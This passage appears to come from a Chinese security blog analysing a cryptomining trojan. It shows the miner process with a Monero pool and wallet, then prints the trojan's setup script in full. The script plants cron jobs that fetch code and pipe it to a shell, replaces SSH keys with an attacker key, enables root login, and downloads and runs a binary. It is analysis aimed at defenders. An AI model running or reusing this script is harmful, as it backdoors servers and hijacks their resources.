此外，还有一种常见模式则是“挖矿木马”，首先还是来看样本：

root 3744 29921 0 19:53 pts/0 00:00:00 grep min
root 31333 1 99 19:48 ? 02:46:38 /opt/minerd -B -a cryptonight 
-o stratum+tcp://xmr.crypto-pool.fr:8080 -u  48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKk
cvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp -p x

uptime看到的负载值非常高。

启动脚本

echo "*/15 * * * * curl -fsSL  | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs 

echo "*/15 * * * * curl -fsSL  | sh" > /var/spool/cron/crontabs/root 

if [ ! -f "/root/.ssh/KHK75NEOiq" ]; 

then mkdir -p ~/.ssh
    rm -f ~/.ssh/authorized_keys* 

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config echo "RSAAuthentication yes" >> /etc/ssh/sshd_config echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart 

fi 

if [ ! -f "/etc/init.d/lady" ]; 

then if [ ! -f "/etc/systemd/system/lady.service" ]; 

then mkdir -p /opt
        curl -fsSL `uname -i` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 fi fi service lady start
systemctl start lady.service
/etc/init.d/lady start 

echo "*/15 * * * * curl -fsSL  | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs 

echo "*/15 * * * * curl -fsSL  | sh" > /var/spool/cron/crontabs/root 

if [ ! -f "/root/.ssh/KHK75NEOiq" ]; 

then mkdir -p ~/.ssh
    rm -f ~/.ssh/authorized_keys* 

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config echo "RSAAuthentication yes" >> /etc/ssh/sshd_config echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
    /etc/init.d/sshd restart 

fi 

if [ ! -f "/etc/init.d/lady" ]; 

then if [ ! -f "/etc/systemd/system/lady.service" ]; 

then mkdir -p /opt
        curl -fsSL `uname -i` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 fi fi service lady start
systemctl start lady.service
/etc/init.d/lady start

mkdir -p /opt 

# /etc/init.d/lady stop 

# systemctl stop lady.service 

# pkill /opt/cron 

# pkill /usr/bin/cron 

# rm -rf /etc/init.d/lady 

# rm -rf /etc/systemd/system/lady.service 

# rm -rf /opt/KHK75NEOiq33 

# rm -rf /usr/bin/cron 

# rm -rf /usr/bin/.cron.old 

# rm -rf /usr/bin/.cron.new

商业模式

被植入比特币“挖矿木马”的电脑，系统性能会受到较大影响，电脑操作会明显卡慢、散热风扇狂转；另一个危害在于，“挖矿木马”会大量耗电，并造成显卡、ＣＰＵ等硬件急剧损耗。比特币具有匿名属性，其交易过程是不可逆的，被盗后根本无法查询是被谁盗取，流向哪里，因此也成为黑客的重点窃取对象。

攻击&防御

植入方式：安全防护策略薄弱，利用Jenkins、Redis等中间件的漏洞发起攻击，获得root权限。

最好的防御可能还是做好防护策略、严密监控服务器资源消耗（CPU／load）。

这种木马很容易变种，很多情况杀毒软件未必能够识别：
63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017

QQ20160711-0.png